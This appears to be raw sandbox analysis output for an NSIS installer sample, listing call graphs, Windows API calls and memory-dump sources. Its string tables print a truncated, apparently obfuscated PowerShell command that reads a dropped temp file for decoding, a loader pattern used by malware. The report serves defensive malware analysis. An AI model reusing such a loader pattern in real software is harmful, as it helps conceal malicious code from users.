3291->3292 3291->3295 3292->3295 3295->3291 3318 404230 SendMessageW 3295->3318 3319 403d03 3295->3319 3322 406284 lstrcpynW 3295->3322 3297 40406c lstrlenW 3298 4062a6 17 API calls 3297->3298 3299 404082 SetWindowTextW 3298->3299 3323 401389 3299->3323 3302 4040e0 CreateDialogParamW 3301->3302 3301->3310 3303 404113 3302->3303 3302->3310 3304 4041fb 18 API calls 3303->3304 3305 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3304->3305 3306 401389 2 API calls 3305->3306 3307 404164 3306->3307 3307->3272 3308 40416c ShowWindow 3307->3308 3309 404247 SendMessageW 3308->3309 3309->3310 3310->3266 3310->3272 3312 404250 SendMessageW 3311->3312 3313 40425f 3311->3313 3312->3313 3313->3284 3315 4062a6 17 API calls 3314->3315 3316 404206 SetDlgItemTextW 3315->3316 3316->3286 3317->3290 3318->3295 3320 4062a6 17 API calls 3319->3320 3321 403d11 SetWindowTextW 3320->3321 3321->3295 3322->3297 3325 401390 3323->3325 3324 4013fe 3324->3284 3325->3324 3326 4013cb MulDiv SendMessageW 3325->3326 3326->3325 3328 401389 2 API calls 3327->3328 3329 401420 3328->3329 3329->3271 3331 4041e1 SendMessageW 3330->3331 3332 4041db 3330->3332 3331->3279 3332->3331 3334 404325 3333->3334 3335 40427a GetWindowLongW 3333->3335 3334->3272 3335->3334 3336 40428f 3335->3336 3336->3334 3337 4042bc GetSysColor 3336->3337 3338 4042bf 3336->3338 3337->3338 3339 4042c5 SetTextColor 3338->3339 3340 4042cf SetBkMode 3338->3340 3339->3340 3341 4042e7 GetSysColor 3340->3341 3342 4042ed 3340->3342 3341->3342 3343 4042f4 SetBkColor 3342->3343 3344 4042fe 3342->3344 3343->3344 3344->3334 3345 404311 DeleteObject 3344->3345 3346 404318 CreateBrushIndirect 3344->3346 3345->3346 3346->3334 3347 4015a3 3348 402c41 17 API calls 3347->3348 3349 4015aa SetFileAttributesW 3348->3349 3350 4015bc 3349->3350 4567 4046a5 4568 4046b5 4567->4568 4569 4046db 4567->4569 4570 4041fb 18 API calls 4568->4570 4571 404262 8 API calls 4569->4571 4573 4046c2 SetDlgItemTextW 4570->4573 4572 4046e7 4571->4572 4573->4569 3472 40542b 3473 4055d5 3472->3473 3474 40544c GetDlgItem GetDlgItem GetDlgItem 3472->3474 3476 405606 3473->3476 3477 4055de GetDlgItem CreateThread CloseHandle 3473->3477 3517 404230 SendMessageW 3474->3517 3479 405631 3476->3479 3480 405656 3476->3480 3481 40561d ShowWindow ShowWindow 3476->3481 3477->3476 3520 4053bf OleInitialize 3477->3520 3478 4054bc 3486 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3478->3486 3482 405691 3479->3482 3483 405645 3479->3483 3484 40566b ShowWindow 3479->3484 3485 404262 8 API calls 3480->3485 3519 404230 SendMessageW 3481->3519 3482->3480 3494 40569f SendMessageW 3482->3494 3488 4041d4 SendMessageW 3483->3488 3490 40568b 3484->3490 3491 40567d 3484->3491 3489 405664 3485->3489 3492 405531 3486->3492 3493 405515 SendMessageW SendMessageW 3486->3493 3488->3480 3496 4041d4 SendMessageW 3490->3496 3495 4052ec 24 API calls 3491->3495 3497 405544 3492->3497 3498 405536 SendMessageW 3492->3498 3493->3492 3494->3489 3499 4056b8 CreatePopupMenu 3494->3499 3495->3490 3496->3482 3501 4041fb 18 API calls 3497->3501 3498->3497 3500 4062a6 17 API calls 3499->3500 3503 4056c8 AppendMenuW 3500->3503 3502 405554 3501->3502 3506 405591 GetDlgItem SendMessageW 3502->3506 3507 40555d ShowWindow 3502->3507 3504 4056e5 GetWindowRect 3503->3504 3505 4056f8 TrackPopupMenu 3503->3505 3504->3505 3505->3489 3508 405713 3505->3508 3506->3489 3511 4055b8 SendMessageW SendMessageW 3506->3511 3509 405580 3507->3509 3510 405573 ShowWindow 3507->3510 3512 40572f SendMessageW 3508->3512 3518 404230 SendMessageW 3509->3518 3510->3509 3511->3489 3512->3512 3513 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3512->3513 3515 405771 SendMessageW 3513->3515 3515->3515 3516 40579a GlobalUnlock SetClipboardData CloseClipboard 3515->3516 3516->3489 3517->3478 3518->3506 3519->3479 3521 404247 SendMessageW 3520->3521 3523 4053e2 3521->3523 3522 404247 SendMessageW 3524 40541b OleUninitialize 3522->3524 3525 405409 3523->3525 3526 401389 2 API calls 3523->3526 3525->3522 3526->3523 3650 4058b0 ShellExecuteExW 4581 401a30 4582 402c41 17 API calls 4581->4582 4583 401a39 ExpandEnvironmentStringsW 4582->4583 4584 401a4d 4583->4584 4586 401a60 4583->4586 4585 401a52 lstrcmpW 4584->4585 4584->4586 4585->4586 4587 404331 lstrcpynW lstrlenW 4588 402032 4589 402044 4588->4589 4590 4020f6 4588->4590 4591 402c41 17 API calls 4589->4591 4592 401423 24 API calls 4590->4592 4593 40204b 4591->4593 4599 402250 4592->4599 4594 402c41 17 API calls 4593->4594 4595 402054 4594->4595 4596 40206a LoadLibraryExW 4595->4596 4597 40205c GetModuleHandleW 4595->4597 4596->4590 4598 40207b 4596->4598 4597->4596 4597->4598 4608 4066cd WideCharToMultiByte 4598->4608 4602 4020c5 4604 4052ec 24 API calls 4602->4604 4603 40208c 4605 401423 24 API calls 4603->4605 4606 40209c 4603->4606 4604->4606 4605->4606 4606->4599 4607 4020e8 FreeLibrary 4606->4607 4607->4599 4609 4066f7 GetProcAddress 4608->4609 4610 402086 4608->4610 4609->4610 4610->4602 4610->4603 4611 403932 4612 40393d 4611->4612 4613 403944 GlobalAlloc 4612->4613 4614 403941 4612->4614 4613->4614 3656 401735 3657 402c41 17 API calls 3656->3657 3658 40173c SearchPathW 3657->3658 3659 401757 3658->3659 4620 402a35 4621 402c1f 17 API calls 4620->4621 4622 402a3b 4621->4622 4623 402a72 4622->4623 4624 40288b 4622->4624 4626 402a4d 4622->4626 4623->4624 4625 4062a6 17 API calls 4623->4625 4625->4624 4626->4624 4628 4061cb wsprintfW 4626->4628 4628->4624 4629 4014b8 4630 4014be 4629->4630 4631 401389 2 API calls 4630->4631 4632 4014c6 4631->4632 4633 401db9 GetDC 4634 402c1f 17 API calls 4633->4634 4635 401dcb GetDeviceCaps MulDiv ReleaseDC 4634->4635 4636 402c1f 17 API calls 4635->4636 4637 401dfc 4636->4637 4638 4062a6 17 API calls 4637->4638 4639 401e39 CreateFontIndirectW 4638->4639 4640 402592 4639->4640 4641 4043ba 4642 4043d2 4641->4642 4643 4044ec 4641->4643 4648 4041fb 18 API calls 4642->4648 4644 404556 4643->4644 4649 404620 4643->4649 4651 404527 GetDlgItem SendMessageW 4643->4651 4645 404560 GetDlgItem 4644->4645 4644->4649 4646 4045e1 4645->4646 4647 40457a 4645->4647 4646->4649 4655 4045f3 4646->4655 4647->4646 4654 4045a0 SendMessageW LoadCursorW SetCursor 4647->4654 4652 404439 4648->4652 4650 404262 8 API calls 4649->4650 4653 40461b 4650->4653 4674 40421d KiUserCallbackDispatcher 4651->4674 4657 4041fb 18 API calls 4652->4657 4675 404669 4654->4675 4659 404609 4655->4659 4660 4045f9 SendMessageW 4655->4660 4662 404446 CheckDlgButton 4657->4662 4659->4653 4665 40460f SendMessageW 4659->4665 4660->4659 4661 404551 4666 404645 SendMessageW 4661->4666 4672 40421d KiUserCallbackDispatcher 4662->4672 4665->4653 4666->4644 4667 404464 GetDlgItem 4673 404230 SendMessageW 4667->4673 4669 40447a SendMessageW 4670 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4669->4670 4671 404497 GetSysColor 4669->4671 4670->4653 4671->4670 4672->4667 4673->4669 4674->4661 4678 4058b0 ShellExecuteExW 4675->4678 4677 4045cf LoadCursorW SetCursor 4677->4646 4678->4677 4679 40283b 4680 402843 4679->4680 4681 402847 FindNextFileW 4680->4681 4684 402859 4680->4684 4682 4028a0 4681->4682 4681->4684 4685 406284 lstrcpynW 4682->4685 4685->4684 4686 402abe InvalidateRect 4687 402ac5 4686->4687

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 30 403482-403487 28->30 31 403489-40348d 28->31 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 30->30 30->31 33 403494-403498 31->33 34 40348f-403493 31->34 36 403557-403564 call 405b86 33->36 37 40349e-4034a4 33->37 34->33 52 403566-403567 36->52 53 403568-40356e 36->53 42 4034a6-4034ae 37->42 43 4034bf-4034f8 37->43 38->39 58 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->58 54 4036c8-4036d8 call 40389a OleUninitialize 39->54 55 40361d-403623 39->55 47 4034b0-4034b3 42->47 48 4034b5 42->48 49 403515-40354f 43->49 50 4034fa-4034ff 43->50 47->43 47->48 48->43 49->36 57 403551-403555 49->57 50->49 56 403501-403509 50->56 52->53 53->28 59 403574 53->59 75 4037fe-403804 54->75 76 4036de-4036ee call 4058ea ExitProcess 54->76 60 4036b8-4036bf call 403974 55->60 61 403629-403634 call 405b86 55->61 63 403510 56->63 64 40350b-40350e 56->64 57->36 65 403576-403584 call 406284 57->65 58->39 58->54 68 403589 59->68 74 4036c4 60->74 79 403682-40368c 61->79 80 403636-40366b 61->80 63->49 64->49 64->63 65->68 68->29 74->54 77 403882-40388a 75->77 78 403806-40381c GetCurrentProcess OpenProcessToken 75->78 85 403890-403894 ExitProcess 77->85 86 40388c 77->86 82 403852-403860 call 40665e 78->82 83 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 78->83 87 4036f4-403708 call 405855 lstrcatW 79->87 88 40368e-40369c call 405c61 79->88 84 40366d-403671 80->84 102 403862-40386c 82->102 103 40386e-403879 ExitWindowsEx 82->103 83->82 92 403673-403678 84->92 93 40367a-40367e 84->93 86->85 100 403715-40372f lstrcatW lstrcmpiW 87->100 101 40370a-403710 lstrcatW 87->101 88->54 99 40369e-4036b4 call 406284 * 2 88->99 92->93 98 403680 92->98 93->84 93->98 98->79 99->60 100->54 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->77 103->106 108 403736-40373b call 4057bb 105->108 109 40373d call 405838 105->109 106->77 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->54 138->126
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                                                          • GetVersion.KERNEL32 ref: 00403382
                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                                          • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                                          • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TjoY7n65om.exe",00000020,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                                            • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                                            • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                                            • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                                          • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TjoY7n65om.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                                          • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                                          • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                                          • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403894
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                          • String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$"C:\Users\user\Desktop\TjoY7n65om.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 3441113951-271050449
                                                                                                                          • Opcode ID: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                                                                          • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                                          • Opcode Fuzzy Hash: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                                                                          • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 151 405691-405695 146->151 152 40563d-405643 146->152 149 405656-40565f call 404262 147->149 150 40561d-40562c ShowWindow * 2 call 404230 147->150 160 405664-405668 149->160 150->146 151->149 157 405697-40569d 151->157 153 405645-405651 call 4041d4 152->153 154 40566b-40567b ShowWindow 152->154 153->149 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->149 165 40569f-4056b2 SendMessageW 157->165 161->151 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                                            • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405673
                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                                                                          • CreatePopupMenu.USER32 ref: 004056B8
                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                                                                          • EmptyClipboard.USER32 ref: 00405753
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                                                                          • CloseClipboard.USER32 ref: 004057AE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {$6B
                                                                                                                          • API String ID: 590372296-3705917127
                                                                                                                          • Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                                          • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                                                                          • Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                                                                          • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 698 40698e-406993 699 406a04-406a22 698->699 700 406995-4069c4 698->700 703 406ffa-40700f 699->703 701 4069c6-4069c9 700->701 702 4069cb-4069cf 700->702 704 4069db-4069de 701->704 705 4069d1-4069d5 702->705 706 4069d7 702->706 707 407011-407027 703->707 708 407029-40703f 703->708 709 4069e0-4069e9 704->709 710 4069fc-4069ff 704->710 705->704 706->704 711 407042-407049 707->711 708->711 712 4069eb 709->712 713 4069ee-4069fa 709->713 716 406bd1-406bef 710->716 714 407070-40707c 711->714 715 40704b-40704f 711->715 712->713 719 406a64-406a92 713->719 724 406812-40681b 714->724 720 407055-40706d 715->720 721 4071fe-407208 715->721 717 406bf1-406c05 716->717 718 406c07-406c19 716->718 723 406c1c-406c26 717->723 718->723 726 406a94-406aac 719->726 727 406aae-406ac8 719->727 720->714 725 407214-407227 721->725 729 406c28 723->729 730 406bc9-406bcf 723->730 731 406821 724->731 732 407229 724->732 733 40722c-407230 725->733 728 406acb-406ad5 726->728 727->728 735 406adb 728->735 736 406a4c-406a52 728->736 737 406ba4-406ba8 729->737 738 406d39-406d46 729->738 730->716 734 406b6d-406b77 730->734 739 406828-40682c 731->739 740 406968-406989 731->740 741 4068cd-4068d1 731->741 742 40693d-406941 731->742 732->733 750 4071bc-4071c6 734->750 751 406b7d-406b9f 734->751 760 406a31-406a49 735->760 761 407198-4071a2 735->761 752 406b05-406b0b 736->752 753 406a58-406a5e 736->753 754 4071b0-4071ba 737->754 755 406bae-406bc6 737->755 738->724 746 406d95-406da4 738->746 739->725 747 406832-40683f 739->747 740->703 744 4068d7-4068f0 741->744 745 40717d-407187 741->745 748 406947-40695b 742->748 749 40718c-407196 742->749 759 4068f3-4068f7 744->759 745->725 746->703 747->732 758 406845-40688b 747->758 762 40695e-406966 748->762 749->725 750->725 751->738 756 406b69 752->756 757 406b0d-406b2b 752->757 753->719 753->756 754->725 755->730 756->734 764 406b43-406b55 757->764 765 406b2d-406b41 757->765 766 4068b3-4068b5 758->766 767 40688d-406891 758->767 759->741 763 4068f9-4068ff 759->763 760->736 761->725 762->740 762->742 773 406901-406908 763->773 774 406929-40693b 763->774 768 406b58-406b62 764->768 765->768 771 4068c3-4068cb 766->771 772 4068b7-4068c1 766->772 769 406893-406896 GlobalFree 767->769 770 40689c-4068aa GlobalAlloc 767->770 768->752 777 406b64 768->777 769->770 770->732 778 4068b0 770->778 771->759 772->771 772->772 775 406913-406923 GlobalAlloc 773->775 776 40690a-40690d GlobalFree 773->776 774->762 775->732 775->774 776->775 780 4071a4-4071ae 777->780 781 406aea-406b02 777->781 778->766 780->725 781->752
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
